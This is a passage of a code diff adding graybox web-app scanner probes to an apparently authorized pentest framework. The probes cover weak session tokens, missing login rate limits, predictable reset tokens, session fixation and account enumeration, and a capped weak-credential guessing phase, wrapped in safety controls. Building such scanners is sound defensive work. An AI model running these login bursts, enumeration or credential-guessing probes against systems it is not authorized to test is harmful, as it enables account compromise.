_test_session_token(self): + """ + PT-A02-06: basic session token quality checks. + + Tests JWT alg=none, short session IDs. + """ + if not self.auth.official_session: + return + + import base64 + import json as _json + evidence = [] + status = "not_vulnerable" + + cookies = self.auth.official_session.cookies.get_dict() + for name, value in cookies.items(): + parts = value.split(".") + if len(parts) == 3: + try: + header_b64 = parts[0] + "=" * (4 - len(parts[0]) % 4) + header = _json.loads(base64.urlsafe_b64decode(header_b64)) + alg = header.get("alg", "") + if alg.lower() == "none": + evidence.append(f"jwt_alg_none=True; cookie={name}") + status = "vulnerable" + elif alg.upper().startswith("HS") and len(parts[2]) < 10: + evidence.append(f"jwt_weak_signature=True; cookie={name}") + if status == "not_vulnerable": + status = "inconclusive" + except Exception: + pass + + if len(value) < 16 and any(c.isalnum() for c in value): + evidence.append(f"short_session_token={name}; length={len(value)}") + if status == "not_vulnerable": + status = "inconclusive" + + severity = "HIGH" if status == "vulnerable" else ( + "LOW" if status == "inconclusive" else "INFO" + ) + self.findings.append(GrayboxFinding( + scenario_id="PT-A02-06", + title="Session token weakness detected" if status != "not_vulnerable" else "Session token quality", + status=status, + severity=severity, + owasp="A02:2021", + cwe=["CWE-331", "CWE-345"] if evidence else [], + evidence=evidence or ["all_tokens_appear_adequate"], + remediation="Use cryptographically random session IDs (128+ bits). " + "Never use alg=none in JWT. Validate JWT signatures server-side.", + )) + + def _test_login_rate_limiting(self): + """ + PT-A02-07: test if login endpoint enforces rate limiting or account lockout. + + Sends a bounded burst of failed login attempts and checks whether the + server blocks, throttles, or continues to accept them unchanged. + """ + session = self.auth.make_anonymous_session() + login_url = self.target_url + self.target_config.login_path + + try: + page = session.get(login_url, timeout=10) + except Exception: + session.close() + return + + csrf_field = self.auth.detected_csrf_field + csrf_token = None + if csrf_field: + csrf_token = self.auth.extract_csrf_value(page.text, csrf_field) + + # Use a non-existent username to avoid locking a real account + test_username = "ratelimit_probe_user_nonexist" + attempts = 8 + blocked = False + lockout_markers = [ + "account locked", "too many attempts", "temporarily blocked", + "account suspended", "try again later", "rate limit", + ] + + for i in range(attempts): + self.safety.throttle(min_delay=0.1) + + # Re-extract CSRF token each time (some frameworks rotate it) + if csrf_field and i > 0: + try: + page = session.get(login_url, timeout=10) + csrf_token = self.auth.extract_csrf_value(page.text, csrf_field) + except Exception: + pass + + payload = { + self.target_config.username_field: test_username, + self.target_config.password_field: f"wrong_password_{i}", + } + if csrf_token and csrf_field: + payload[csrf_field] = csrf_token + + try: + resp = session.post( + login_url, data=payload, + headers={"Referer": login_url}, + timeout=10, + ) + except Exception: + continue + + if resp.status_code == 429: + blocked = True + break + body_lower = resp.text.lower() + if any(m in body_lower for m in lockout_markers): + blocked = True + break + + session.close() + + if not blocked: + self.findings.append(GrayboxFinding( + scenario_id="PT-A02-07", + title="Login rate limiting not enforced", + status="vulnerable", + severity="MEDIUM", + owasp="A02:2021", + cwe=["CWE-307"], + attack=["T1110"], + evidence=[ + f"endpoint={login_url}", + f"attempts={attempts}", + "lockout_triggered=False", + "rate_limiting_detected=False", + ], + replay_steps=[ + f"Send {attempts} failed login attempts in rapid succession.", + "Observe no lockout or rate limiting response.", + ], + remediation="Implement account lockout after repeated failures. " + "Add rate limiting (e.g. 429 responses) on login endpoints.", + )) + else: + self.findings.append(GrayboxFinding( + scenario_id="PT-A02-07", + title="Login rate limiting — enforced", + status="not_vulnerable", + severity="INFO", + owasp="A02:2021", + evidence=[ + f"endpoint={login_url}", + f"lockout_triggered_after={attempts}_or_fewer_attempts", + ], + )) + + def _test_password_reset_token(self): + """ + PT-A07-02: test password reset token predictability. + + Requests two reset tokens for the same user and checks: + 1. Token is exposed in the response body (info leak). + 2. Token matches a predictable pattern (e.g. reset-{username}). + 3. Token is identical across requests (no randomness). + """ + reset_path = self.target_config.password_reset_path + if not reset_path: + return + + session = self.auth.make_anonymous_session() + reset_url = self.target_url + reset_path + test_username = self.auth.target_config.username_field and "admin" + + # Get CSRF token for the reset form + try: + page = session.get(reset_url, timeout=10) + except Exception: + session.close() + return + + if page.status_code == 404: + session.close() + return + + csrf_field = self.auth.detected_csrf_field + csrf_token = None + if csrf_field: + csrf_token = self.auth.extract_csrf_value(page.text, csrf_field) + + import re + tokens = [] + for i in range(2): + self.safety.throttle() + if i > 0 and csrf_field: + try: + page = session.get(reset_url, timeout=10) + csrf_token = self.auth.extract_csrf_value(page.text, csrf_field) + except Exception: + pass + + payload = {"username": test_username} + if csrf_token and csrf_field: + payload[csrf_field] = csrf_token + + try: + resp = session.post( + reset_url, data=payload, + headers={"Referer": reset_url}, + timeout=10, allow_redirects=True, + ) + except Exception: + continue + + # Look for token-like strings in the response + body = resp.text + # Common patterns: "token": "...", token=..., /confirm?token=... + token_patterns = [ + re.compile(r'reset[-_]token["\s:=]+([a-zA-Z0-9_-]{4,})', re.I), + re.compile(r'token["\s:=]+([a-zA-Z0-9_-]{8,})', re.I), + re.compile(r'Your reset (?:token|code)[^<]*?(\S{4,})', re.I), + # Direct token display (e.g. "reset-admin") + re.compile(r'(reset-\w+)', re.I), + ] + for pat in token_patterns: + m = pat.search(body) + if m: + tokens.append(m.group(1)) + break + + session.close() + + evidence = [] + status = "not_vulnerable" + issues = [] + + if len(tokens) >= 1: + evidence.append(f"token_exposed_in_response=True") + issues.append("token_leaked_in_body") + + if len(tokens) >= 2 and tokens[0] == tokens[1]: + evidence.append(f"tokens_identical=True") + issues.append("no_randomness") + + for token in tokens: + # Check for predictable format: reset-{username} + if token.lower() == f"reset-{test_username}".lower(): + evidence.append(f"predictable_token_format=reset-{{username}}") + issues.append("predictable_format") + break + # Check for very short tokens + if len(token) < 16: + evidence.append(f"token_length={len(token)}") + issues.append("short_token") + break + + if "predictable_format" in issues or "no_randomness" in issues: + status = "vulnerable" + elif "token_leaked_in_body" in issues or "short_token" in issues: + status = "inconclusive" + + if status == "vulnerable": + self.findings.append(GrayboxFinding( + scenario_id="PT-A07-02", + title="Predictable password reset tokens", + status="vulnerable", + severity="HIGH", + owasp="A07:2021", + cwe=["CWE-640", "CWE-330"], + attack=["T1110"], + evidence=evidence, + replay_steps=[ + f"POST to {reset_path} with username={test_username}.", + "Extract token from response body.", + "Observe token matches predictable pattern.", + ], + remediation="Use cryptographically random tokens (128+ bits). " + "Never expose tokens in HTML responses. " + "Enforce single-use and short expiration.", + )) + elif status == "inconclusive": + self.findings.append(GrayboxFinding( + scenario_id="PT-A07-02", + title="Password reset token — potential weakness", + status="inconclusive", + severity="LOW", + owasp="A07:2021", + cwe=["CWE-640"], + evidence=evidence, + remediation="Use cryptographically random tokens (128+ bits). " + "Do not expose tokens in HTML responses.", + )) + elif tokens: + self.findings.append(GrayboxFinding( + scenario_id="PT-A07-02", + title="Password reset token — no weakness detected", + status="not_vulnerable", + severity="INFO", + owasp="A07:2021", + evidence=[f"tokens_checked={len(tokens)}"], + )) + + def _test_session_fixation(self): + """ + PT-A07-03: test if session token rotates after successful login. + + Session fixation occurs when the session ID remains the same before + and after authentication. An attacker who can set a pre-auth session + cookie (via XSS, URL injection, or subdomain) gains full access once + the victim logs in with that same session ID. + + Compares pre-auth cookies from a fresh anonymous session against the + post-auth cookies on the already-established official session. + Read-only: does not perform additional logins. + """ + if not self.auth.official_session: + return + + login_url = self.target_url + self.target_config.login_path + + # Step 1: GET login page with a fresh session, capture pre-auth cookies + pre_session = self.auth.make_anonymous_session() + try: + pre_session.get(login_url, timeout=10, allow_redirects=True) + except Exception: + pre_session.close() + return + + pre_cookies = pre_session.cookies + if hasattr(pre_cookies, "get_dict"): + pre_cookies = pre_cookies.get_dict() + else: + pre_cookies = dict(pre_cookies) + + pre_session.close() + + if not pre_cookies: + return # no pre-auth cookies → can't test fixation + + # Step 2: get post-auth cookies from the existing official session + post_cookies = self.auth.official_session.cookies + if hasattr(post_cookies, "get_dict"): + post_cookies = post_cookies.get_dict() + else: + post_cookies = dict(post_cookies) + + if not post_cookies: + return # no post-auth cookies → can't compare + + # Step 3: compare session cookies + # Find cookies that exist in BOTH pre-auth and post-auth with the same value + csrf_field = self.auth.detected_csrf_field + csrf_names = {"csrftoken", "csrf_token", "_csrf"} + if csrf_field: + csrf_names.add(csrf_field.lower()) + + fixed_cookies = [] + for name, pre_value in pre_cookies.items(): + post_value = post_cookies.get(name) + if post_value and pre_value == post_value: + # Skip CSRF tokens — they're not session identifiers + if name.lower() in csrf_names: + continue + fixed_cookies.append(name) + + if fixed_cookies: + self.findings.append(GrayboxFinding( + scenario_id="PT-A07-03", + title="Session fixation — token not rotated after login", + status="vulnerable", + severity="HIGH", + owasp="A07:2021", + cwe=["CWE-384"], + attack=["T1550"], + evidence=[ + f"fixed_cookies={','.join(fixed_cookies)}", + "pre_auth_value_equals_post_auth_value=True", + ], + replay_steps=[ + "Obtain a pre-authentication session cookie.", + "Log in using valid credentials.", + "Observe that the session cookie value did not change.", + "An attacker who sets this cookie before login inherits the authenticated session.", + ], + remediation="Regenerate session ID after successful authentication. " + "Django: this is automatic. Flask: call session.regenerate(). " + "Rails: call reset_session in the login action.", + )) + else: + self.findings.append(GrayboxFinding( + scenario_id="PT-A07-03", + title="Session fixation — token properly rotated", + status="not_vulnerable", + severity="INFO", + owasp="A07:2021", + evidence=[ + f"pre_auth_cookies={len(pre_cookies)}", + f"post_auth_cookies={len(post_cookies)}", + "all_session_tokens_rotated=True", + ], + )) + + def _test_account_enumeration(self): + """ + PT-A07-04: test if login responses differ for valid vs invalid usernames. + + Compares error responses when submitting: + 1. A known-valid username with a wrong password + 2. A definitely-invalid username with a wrong password + + If the responses differ (different error message, status code, or + response length), attackers can enumerate valid accounts. + + Read-only: only submits failed login attempts. + """ + login_url = self.target_url + self.target_config.login_path + + # We need a known-valid username — use the official account username + valid_username = self.auth.target_config.username_field + # Actually, we need the actual username value, not the field name. + # We can infer it: if official_session exists, the configured username is valid. + # The username is not stored in AuthManager — use the regular_username from probe + # init, or fall back to common defaults. + valid_username = self.regular_username or "admin" + + invalid_username = "enum_probe_nonexistent_user_x9z7q" + wrong_password = "wrong_password_probe" + + session = self.auth.make_anonymous_session() + + def _submit_login(username): + """Submit a failed login and return (status_code, body, content_length).""" + try: + page = session.get(login_url, timeout=10) + except Exception: + return None + + csrf_field = self.auth.detected_csrf_field + csrf_token = None + if csrf_field: + csrf_token = self.auth.extract_csrf_value(page.text, csrf_field) + + payload = { + self.target_config.username_field: username, + self.target_config.password_field: wrong_password, + } + if csrf_token and csrf_field: + payload[csrf_field] = csrf_token + + try: + resp = session.post( + login_url, data=payload, + headers={"Referer": login_url}, + timeout=10, allow_redirects=True, + ) + except Exception: + return None + + return (resp.status_code, resp.text, len(resp.text)) + + self.safety.throttle() + result_valid = _submit_login(valid_username) + self.safety.throttle() + result_invalid = _submit_login(invalid_username) + + session.close() + + if not result_valid or not result_invalid: + return + + status_valid, body_valid, len_valid = result_valid + status_invalid, body_invalid, len_invalid = result_invalid + + differences = [] + + # Check status code difference + if status_valid != status_invalid: + differences.append(f"status_code: valid={status_valid}, invalid={status_invalid}") + + # Check for different error messages + # Extract the specific error text near common patterns + import re + error_patterns = [ + r'(?:class=["\'][^"\']*error[^"\']*["\'][^>]*>)(.*?)<', + r'(?:class=["\'][^"\']*alert[^"\']*["\'][^>]*>)(.*?)<', + r'(?:class=["\'][^"\']*message[^"\']*["\'][^>]*>)(.*?)<', + ] + msg_valid = "" + msg_invalid = "" + for pat in error_patterns: + m_valid = re.search(pat, body_valid, re.I | re.DOTALL) + m_invalid = re.search(pat, body_invalid, re.I | re.DOTALL) + if m_valid: + msg_valid = m_valid.group(1).strip() + if m_invalid: + msg_invalid = m_invalid.group(1).strip() + if msg_valid and msg_invalid: + break + + if msg_valid and msg_invalid and msg_valid != msg_invalid: + differences.append(f"error_message: valid_user='{msg_valid[:80]}', " + f"invalid_user='{msg_invalid[:80]}'") + + # Check response length difference (>10% threshold to avoid noise) + if len_valid > 0 and len_invalid > 0: + ratio = abs(len_valid - len_invalid) / max(len_valid, len_invalid) + if ratio > 0.10: + differences.append(f"response_length: valid={len_valid}, invalid={len_invalid}") + + if differences: + self.findings.append(GrayboxFinding( + scenario_id="PT-A07-04", + title="Account enumeration via login response differences", + status="vulnerable", + severity="MEDIUM", + owasp="A07:2021", + cwe=["CWE-204"], + attack=["T1078"], + evidence=differences, + replay_steps=[ + f"Submit login with valid username '{valid_username}' and wrong password.", + f"Submit login with invalid username '{invalid_username}' and wrong password.", + "Compare responses — differences reveal account existence.", + ], + remediation="Return identical error messages for all failed login attempts. " + "Use generic text like 'Invalid credentials' regardless of " + "whether the username exists.", + )) + else: + self.findings.append(GrayboxFinding( + scenario_id="PT-A07-04", + title="Account enumeration — responses consistent", + status="not_vulnerable", + severity="INFO", + owasp="A07:2021", + evidence=[ + f"status_codes_match={status_valid == status_invalid}", + f"response_lengths_similar=True", + ], + )) diff --git a/extensions/business/cybersec/red_mesh/graybox/safety.py b/extensions/business/cybersec/red_mesh/graybox/safety.py new file mode 100644 index 00000000..c46126b2 --- /dev/null +++ b/extensions/business/cybersec/red_mesh/graybox/safety.py @@ -0,0 +1,91 @@ +""" +Safety controls for graybox scanning. + +Rate limiting, attempt budgeting, and target validation. +""" + +import time +from urllib.parse import urlparse + +from ..constants import ( + GRAYBOX_DEFAULT_DELAY, + GRAYBOX_WEAK_AUTH_DELAY, + GRAYBOX_MAX_WEAK_ATTEMPTS, +) + + +class SafetyControls: + """Rate limiting, attempt budgeting, and target validation.""" + + def __init__(self, request_delay=None, weak_auth_delay=None, + target_is_local=False): + self._request_delay = request_delay or GRAYBOX_DEFAULT_DELAY + self._weak_auth_delay = weak_auth_delay or GRAYBOX_WEAK_AUTH_DELAY + self._last_request_at = 0.0 + # Enforce minimum delay for non-local targets to avoid + # triggering WAF blocking or causing DoS on resource-constrained targets. + if not target_is_local and self._request_delay < GRAYBOX_DEFAULT_DELAY: + self._request_delay = GRAYBOX_DEFAULT_DELAY + + def throttle(self, min_delay=None): + """Enforce minimum delay between requests.""" + delay = min_delay or self._request_delay + elapsed = time.time() - self._last_request_at + if elapsed < delay: + time.sleep(delay - elapsed) + self._last_request_at = time.time() + + def throttle_auth(self): + """Throttle for auth attempts (higher delay).""" + self.throttle(min_delay=self._weak_auth_delay) + + @staticmethod + def clamp_attempts(requested: int) -> int: + """Enforce hard cap on weak-auth attempts.""" + return min(max(requested, 0), GRAYBOX_MAX_WEAK_ATTEMPTS) + + @staticmethod + def is_local_target(target_url: str) -> bool: + """Check if target is localhost/loopback.""" + parsed = urlparse(target_url) + hostname = (parsed.hostname or "").lower() + return hostname in ("localhost", "127.0.0.1", "0.0.0.0", "::1", + "host.docker.internal") + + @staticmethod + def validate_target(target_url: str, authorized: bool) -> str | None: + """ + Validate target URL before scanning. + + Returns error message if invalid, None if OK. + """ + if not authorized: + return "Scan not authorized. Set authorized=True to confirm." + + parsed = urlparse(target_url) + if not parsed.scheme or not parsed.hostname: + return f"Invalid target URL: {target_url}" + if parsed.scheme not in ("http", "https"): + return f"Unsupported scheme: {parsed.scheme}" + + # Block obviously wrong targets + blocked = {"google.com", "facebook.com", "amazon.com", "github.com"} + hostname = parsed.hostname.lower() + for domain in blocked: + if hostname == domain or hostname.endswith("." + domain): + return f"Target {hostname} is a public service. Refusing scan." + + return None + + @staticmethod + def sanitize_error(msg: str) -> str: + """ + Remove potential credential leaks from error messages. + + Scrubs password= patterns and common secret markers. + """ + import re + msg = re.sub(r'password["\']?\s*[:=]\s*["\']?[^\s"\'&]+', 'password=***', msg, flags=re.I) + msg = re.sub(r'secret["\']?\s*[:=]\s*["\']?[^\s"\'&]+', 'secret=***', msg, flags=re.I) + msg = re.sub(r'token["\']?\s*[:=]\s*["\']?[^\s"\'&]+', 'token=***', msg, flags=re.I) + return msg diff --git a/extensions/business/cybersec/red_mesh/graybox/worker.py b/extensions/business/cybersec/red_mesh/graybox/worker.py new file mode 100644 index 00000000..444d54b0 --- /dev/null +++ b/extensions/business/cybersec/red_mesh/graybox/worker.py @@ -0,0 +1,490 @@ +""" +Graybox (authenticated webapp) scan worker. + +Inherits from BaseLocalWorker (Phase 0) and orchestrates: +Preflight → Authentication → Route Discovery → Probes → Weak Auth → Cleanup. +""" + +import importlib +from urllib.parse import urlparse + +from ..worker.base import BaseLocalWorker +from ..constants import GRAYBOX_PROBE_REGISTRY +from .findings import GrayboxEvidenceArtifact, GrayboxFinding +from .auth import AuthManager +from .discovery import DiscoveryModule +from .safety import SafetyControls +from .models import ( + DiscoveryResult, + GrayboxCredentialSet, + GrayboxProbeContext, + GrayboxProbeDefinition, + GrayboxProbeRunResult, + GrayboxTargetConfig, +) + +# Weak auth uses a direct import (not the registry) because it is a +# distinct pipeline phase, not a generic probe. +from .probes.business_logic import BusinessLogicProbes + + +class GrayboxLocalWorker(BaseLocalWorker): + PHASE_PLAN = ( + ("preflight", "_run_preflight_phase"), + ("authentication", "_run_authentication_phase"), + ("discovery", "_run_discovery_phase"), + ("graybox_probes", "_run_probe_phase"), + ("weak_auth", "_run_weak_auth_phase"), + ) + + """ + Authenticated webapp probe worker. + + Inherits from BaseLocalWorker (Phase 0), which provides: + - self.owner, self.job_id, self.initiator, self.target + - self.local_worker_id (format "RM-{prefix}-{uuid[:4]}") + - self.thread, self.stop_event (set by inherited start()) + - self.metrics (MetricsCollector instance) + - self.initial_ports (declared, subclass populates) + - self.state (declared as {}, subclass populates with full key set) + - start(), stop(), _check_stopped(), P() — all inherited, not redefined + + Uses the two-layer finding architecture: + - Probes create GrayboxFinding instances (layer 1) + - Worker stores serialized findings in state["graybox_results"] (layer 2) + - pentester_api_01.py normalizes them into flat finding dicts via + _compute_risk_and_findings() + """ + + def __init__(self, owner, job_id, target_url, job_config, + local_id="1", initiator=""): + parsed = urlparse(target_url) + + super().__init__( + owner=owner, + job_id=job_id, + initiator=initiator, + local_id_prefix=local_id, + target=parsed.hostname, + ) + + self.target_url = target_url.rstrip("/") + self.job_config = job_config + self._port = parsed.port or (443 if parsed.scheme == "https" else 80) + self._port_key = str(self._port) + + self.initial_ports = [self._port] + + self.target_config = GrayboxTargetConfig.from_dict( + job_config.target_config or {} + ) + + # Modules (composition) + self.safety = SafetyControls( + request_delay=job_config.scan_min_delay or None, + target_is_local=SafetyControls.is_local_target(target_url), + ) + self.auth = AuthManager( + target_url=self.target_url, + target_config=self.target_config, + verify_tls=job_config.verify_tls, + ) + self.discovery = DiscoveryModule( + target_url=self.target_url, + auth_manager=self.auth, + safety=self.safety, + target_config=self.target_config, + ) + + self.state = { + "job_id": job_id, + "initiator": initiator, + "target": parsed.hostname, + "scan_type": "webapp", + "target_url": self.target_url, + "open_ports": [self._port], + "ports_scanned": [self._port], + "port_protocols": {self._port_key: parsed.scheme}, + "service_info": {}, + "web_tests_info": {}, + "correlation_findings": [], + "graybox_results": {}, + "completed_tests": [], + "done": False, + "canceled": False, + } + self._phase = "" + self._credentials = GrayboxCredentialSet.from_job_config(job_config) + + @classmethod + def get_feature_prefixes(cls): + """Return feature prefixes for compatibility with capability discovery.""" + return ["_graybox_"] + + @classmethod + def get_supported_features(cls, categs=False): + """Return supported graybox features from the explicit probe registry.""" + features = [probe.key for probe in cls._iter_probe_definitions()] + ["_graybox_weak_auth"] + if categs: + return {"graybox": features} + return features + + @staticmethod + def _iter_probe_definitions(): + return [GrayboxProbeDefinition.from_entry(entry) for entry in GRAYBOX_PROBE_REGISTRY] + + # start(), stop(), _check_stopped(), P() are ALL inherited from + # BaseLocalWorker. NOT redefined here. + + def get_status(self, for_aggregations=False): + """Return worker state for aggregation by pentester_api_01.py.""" + status = dict(self.state) + scenario_stats = self._compute_scenario_stats() + metrics = self.metrics.build().to_dict() + metrics.update({ + "scenarios_total": scenario_stats["total"], + "scenarios_vulnerable": scenario_stats["vulnerable"], + "scenarios_clean": scenario_stats["not_vulnerable"], + "scenarios_inconclusive": scenario_stats["inconclusive"], + "scenarios_error": scenario_stats["error"], + }) + status["scan_metrics"] = metrics + status["scenario_stats"] = scenario_stats + + if not for_aggregations: + status["local_worker_id"] = self.local_worker_id + status["done"] = self.state["done"] + status["canceled"] = self.state["canceled"] + status["progress"] = self._phase or "initializing" + + return status + + def execute_job(self): + """Preflight → Auth → Discover → Probes → Weak Auth → Cleanup → Done.""" + discovery_result = DiscoveryResult() + self.metrics.start_scan(1) + try: + self._run_preflight_phase() + if self._check_stopped(): + return + + auth_ok = self._run_authentication_phase() + if not auth_ok: + return + + if not self._check_stopped(): + discovery_result = self._run_discovery_phase() + + if not self._check_stopped(): + self._run_probe_phase(discovery_result) + + if not self._check_stopped(): + self._run_weak_auth_phase(discovery_result) + + except Exception as exc: + self._record_fatal(self.safety.sanitize_error(str(exc))) + finally: + self.auth.cleanup() + self.metrics.phase_end(self._phase) + self.state["done"] = True + + def _run_preflight_phase(self): + self._set_phase("preflight") + self.metrics.phase_start("preflight") + target_error = self.safety.validate_target( + self.target_url, self.job_config.authorized, + ) + if target_error: + self._record_fatal(target_error) + return + + preflight_error = self.auth.preflight_check() + if preflight_error: + self._record_fatal(preflight_error) + return + + if not self.job_config.verify_tls: + self.P( + f"WARNING: TLS verification disabled for {self.target_url}. " + "Credentials may be intercepted by a MITM attacker.", color='y' + ) + self._store_findings("_graybox_preflight", [GrayboxFinding( + scenario_id="PREFLIGHT-TLS", + title="TLS verification disabled", + status="inconclusive", + severity="LOW", + owasp="A02:2021", + cwe=["CWE-295"], + evidence=[f"verify_tls=False", f"target={self.target_url}"], + remediation="Enable TLS verification or use a trusted certificate.", + )]) + self.metrics.phase_end("preflight") + + def _run_authentication_phase(self) -> bool: + self._set_phase("authentication") + self.metrics.phase_start("authentication") + auth_ok = self.auth.authenticate(self._credentials.official, self._credentials.regular) + self._store_auth_results() + self.state["completed_tests"].append("graybox_auth") + self.metrics.phase_end("authentication") + + if not auth_ok: + self._record_fatal("Official authentication failed. Cannot proceed with graybox scan.") + return False + return True + + def _run_discovery_phase(self) -> DiscoveryResult: + self._set_phase("discovery") + self.metrics.phase_start("discovery") + if not self._ensure_active_sessions("discovery"): + self.metrics.phase_end("discovery") + return DiscoveryResult() + result = None + discover_result = getattr(self.discovery, "discover_result", None) + if callable(discover_result): + maybe_result = discover_result(known_routes=self.job_config.app_routes) + if isinstance(maybe_result, DiscoveryResult): + result = maybe_result + if result is None: + routes, forms = self.discovery.discover( + known_routes=self.job_config.app_routes, + ) + result = DiscoveryResult(routes=routes, forms=forms) + self._store_discovery_results(result.routes, result.forms) + self.state["completed_tests"].append("graybox_discovery") + self.metrics.phase_end("discovery") + return result + + def _build_probe_kwargs(self, discovery_result: DiscoveryResult) -> dict: + return GrayboxProbeContext( + target_url=self.target_url, + auth_manager=self.auth, + target_config=self.target_config, + safety=self.safety, + discovered_routes=discovery_result.routes, + discovered_forms=discovery_result.forms, + regular_username=self._credentials.regular.username if self._credentials.regular else "", + allow_stateful=self.job_config.allow_stateful_probes, + ) + + def _run_probe_phase(self, discovery_result: DiscoveryResult): + self._set_phase("graybox_probes") + self.metrics.phase_start("graybox_probes") + if not self._ensure_active_sessions("graybox_probes"): + self.metrics.phase_end("graybox_probes") + return + + probe_context = self._build_probe_kwargs(discovery_result) + excluded_features = set(self.job_config.excluded_features or []) + graybox_excluded = "graybox" in excluded_features + + if not graybox_excluded: + for probe_def in self._iter_probe_definitions(): + if self._check_stopped(): + break + + store_key = probe_def.key + + if store_key in excluded_features: + self.metrics.record_probe(store_key, "skipped:disabled") + continue + + self._run_registered_probe(probe_def, probe_context) + else: + for probe_def in self._iter_probe_definitions(): + self.metrics.record_probe(probe_def.key, "skipped:disabled") + + self.state["completed_tests"].append("graybox_probes") + self.metrics.phase_end("graybox_probes") + + def _run_weak_auth_phase(self, discovery_result: DiscoveryResult): + if ( + self._credentials.weak_candidates + and "_graybox_weak_auth" not in (self.job_config.excluded_features or []) + ): + self._set_phase("weak_auth") + self.metrics.phase_start("weak_auth") + if not self._ensure_active_sessions("weak_auth"): + self.metrics.phase_end("weak_auth") + return + probe_context = self._build_probe_kwargs(discovery_result) + bl_probe = BusinessLogicProbes( + **dict(probe_context.to_kwargs(), allow_stateful=False), + ) + try: + weak_findings = bl_probe.run_weak_auth( + self._credentials.weak_candidates, + self._credentials.max_weak_attempts, + ) + self._store_findings("_graybox_weak_auth", weak_findings) + self.metrics.record_probe("_graybox_weak_auth", "completed") + except Exception as exc: + self._record_probe_error("_graybox_weak_auth", exc) + self.metrics.record_probe("_graybox_weak_auth", "failed") + self.state["completed_tests"].append("graybox_weak_auth") + self.metrics.phase_end("weak_auth") + elif self._credentials.weak_candidates and "_graybox_weak_auth" in (self.job_config.excluded_features or []): + self.metrics.record_probe("_graybox_weak_auth", "skipped:disabled") + + def _run_registered_probe(self, entry, probe_context: GrayboxProbeContext): + """Run one registered probe through a shared capability and error boundary.""" + probe_def = GrayboxProbeDefinition.from_entry(entry) + store_key = probe_def.key + probe_cls = self._import_probe(probe_def.cls_path) + + if probe_cls.is_stateful and not probe_context.allow_stateful: + self.metrics.record_probe(store_key, "skipped:stateful_disabled") + self._store_findings(store_key, [GrayboxFinding( + scenario_id=f"SKIP-{store_key}", + title="Probe skipped: stateful probes disabled", + status="inconclusive", severity="INFO", owasp="", + evidence=["stateful_probes_disabled=True"], + )]) + return + if probe_cls.requires_regular_session and not self.auth.regular_session: + self.metrics.record_probe(store_key, "skipped:missing_regular_session") + return + if probe_cls.requires_auth and not self.auth.official_session: + self.metrics.record_probe(store_key, "skipped:missing_auth") + return + + require_regular = bool(probe_cls.requires_regular_session) + if not self._ensure_active_sessions(store_key, require_regular=require_regular): + self.metrics.record_probe(store_key, "failed:auth_refresh") + return + + try: + from_context = getattr(probe_cls, "from_context", None) + has_explicit_from_context = "from_context" in getattr(probe_cls, "__dict__", {}) + if has_explicit_from_context and callable(from_context): + probe = from_context(probe_context) + else: + probe = probe_cls(**probe_context.to_kwargs()) + run_result = self._normalize_probe_run_result(probe.run()) + self._store_findings(store_key, run_result) + self.metrics.record_probe(store_key, run_result.outcome) + except Exception as exc: + self._record_probe_error(store_key, exc) + self.metrics.record_probe(store_key, "failed") + + def _ensure_active_sessions(self, scope, require_regular=False): + """Fail closed if session refresh cannot restore required auth state.""" + auth_ok = self.auth.ensure_sessions( + self._credentials.official, + self._credentials.regular if require_regular or self._credentials.regular else None, + ) + if auth_ok: + return True + + sanitized_scope = scope.replace("_", " ") + self._record_fatal( + f"Authentication session refresh failed during {sanitized_scope}. " + "Graybox scan cannot continue safely." + ) + return False + + @staticmethod + def _normalize_probe_run_result(value) -> GrayboxProbeRunResult: + return GrayboxProbeRunResult.from_value(value) + + def _store_findings(self, key, findings): + """Store GrayboxFinding dicts in graybox_results under the port key.""" + run_result = self._normalize_probe_run_result(findings) + port_results = self.state["graybox_results"].setdefault(self._port_key, {}) + port_results[key] = { + "findings": [f.to_dict() for f in run_result.findings], + "artifacts": [ + GrayboxEvidenceArtifact.from_value(artifact).to_dict() + for artifact in run_result.artifacts + ], + "outcome": run_result.outcome, + } + for finding in run_result.findings: + self.metrics.record_finding(getattr(finding, "severity", "INFO")) + + def _store_auth_results(self): + port_info = self.state["service_info"].setdefault(self._port_key, {}) + port_info["_graybox_auth"] = { + "official_success": self.auth.official_session is not None, + "regular_success": self.auth.regular_session is not None, + "auth_errors": list(self.auth._auth_errors), + "findings": [], + } + + def _store_discovery_results(self, routes, forms): + port_info = self.state["service_info"].setdefault(self._port_key, {}) + port_info["_graybox_discovery"] = { + "routes": routes, + "forms": forms, + "findings": [], + } + + def _record_fatal(self, message): + """Record unrecoverable error as a GrayboxFinding.""" + self._store_findings("_graybox_fatal", [GrayboxFinding( + scenario_id="FATAL", + title="Scan aborted", + status="inconclusive", + severity="INFO", + owasp="", + evidence=[f"error={message}"], + error=message, + )]) + + def _record_probe_error(self, store_key, exc): + """Record per-probe error without killing the scan.""" + sanitized = self.safety.sanitize_error(str(exc)) + self._store_findings(store_key, [GrayboxFinding( + scenario_id=f"ERR-{store_key}", + title=f"Probe error: {store_key}", + status="inconclusive", + severity="INFO", + owasp="", + evidence=[f"error={sanitized}"], + error=sanitized, + )]) + + @staticmethod + def _import_probe(cls_path): + """Dynamically import a probe class from the registry.""" + module_name, class_name = cls_path.rsplit(".", 1) + full_module = f"..probes.{module_name}" + mod = importlib.import_module(full_module, package=__name__) + return getattr(mod, class_name) + + def _set_phase(self, phase): + self._phase = phase + + def _compute_scenario_stats(self): + """Compute scenario stats from graybox_results.""" + stats = { + "total": 0, "vulnerable": 0, "not_vulnerable": 0, + "inconclusive": 0, "error": 0, + } + for port_key, probes in self.state["graybox_results"].items(): + for probe_key, probe_data in probes.items(): + for finding in probe_data.get("findings", []): + status = finding.get("status", "") + if not status: + continue + stats["total"] += 1 + if status in stats: + stats[status] += 1 + else: + stats["error"] += 1 + return stats + + @staticmethod + def get_worker_specific_result_fields(): + """Register graybox_results for aggregation.""" + return { + "graybox_results": dict, + "service_info": dict, + "web_tests_info": dict, + "open_ports": list, + "completed_tests": list, + "port_protocols": dict, + "correlation_findings": list, + "scan_metrics": dict, + "ports_scanned": list, + } diff --git a/extensions/business/cybersec/red_mesh/mixins/__init__.py b/extensions/business/cybersec/red_mesh/mixins/__init__.py new file mode 100644 index 00000000..ec68a976 --- /dev/null +++ b/extensions/business/cybersec/red_mesh/mixins/__init__.py @@ -0,0 +1,13 @@ +from .attestation import _AttestationMixin +from .risk import _RiskScoringMixin +from .report import _ReportMixin +from .live_progress import _LiveProgressMixin +from .llm_agent import _RedMeshLlmAgentMixin + +__all__ = [ + "_AttestationMixin", + "_RiskScoringMixin", + "_ReportMixin", + "_LiveProgressMixin", + "_RedMeshLlmAgentMixin", +] diff --git a/extensions/business/cybersec/red_mesh/mixins/attestation.py 